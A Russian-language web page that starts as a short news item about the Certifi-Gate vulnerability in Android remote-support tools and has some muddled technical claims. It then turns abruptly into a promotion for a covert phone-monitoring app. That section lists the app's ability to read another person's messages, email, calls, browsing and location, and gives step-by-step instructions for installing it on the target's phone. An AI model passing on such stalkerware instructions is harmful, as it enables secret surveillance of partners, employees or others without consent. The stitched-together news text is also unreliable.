Новая критическая уязвимость Android

017295e9ebeac872cc5904b17d66b14b

Новость об очередной ошибке ядра Google Android уже давно перестала кого-то удивлять. Очередное открытие сделали специалисты Check Point. Критическое обновление, именуемое Certifi-Gate, может приводить к различным неприятным последствиям.

Особенно несладко придётся владельцам корпоративных телефонов, в которых храниться важная служебная информация. Теоретически злоумышленник сможет воспользоваться дырой, которая содержится в списке сертификатов безопасности Remote Support Tool (сокращённо mRST). Обычно они заранее предустанавливаются в ОС Android и входят в стандартные версии прошивок. В кастомных вариациях их тоже редко устраняют.

Инструмент mRST изначально предназначается для удалённой поддержки мобильного устройства. Это требует предоставление прав к системе на уровне суперпользователя, что подобным программам и приходится делать. Для этого требуется предусмотреть различные ситуации и ряд факторов, облегчающих работу на уровне ОС.

А вот мобильные трояны уже давно научились контролировать mRST, используя инструмент для запуска сторонних, подчас вредоносных приложений. Злоумышленник может воспользоваться mRST для того, чтобы удалённо делать скриншоты экрана, записывать звуки окружения через встроенный мобильный микрофон, копировать книгу контактов и SMS, просматривать фотографии и т.п. Одним словом – всё!

Если конкретизировать эту информацию, то проблема затрагивала следующие приложения для конференции связи и удалённого доступа — TeamViewer, Rsupport и CommuniTake Remote Care. Поэтому рекомендуется воздержаться от установки подобного софта на свой мобильник. Найденная брешь не является непосредственной ошибкой Google, поскольку находится не на программном уровне.

По сведениям специалистов Check Point, решить проблему в ближайшее время не получится. Для этого требуется обновление аппаратного обеспечения, выпуск новых смартфонов с соответствующими исправлениями. Способов отменить подписи сертификатов с плагинами, в которых найдены уязвимости, на данный момент не существует. Все ведущие производители Android смартфонов уже в курсе обнаруженной проблемы.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.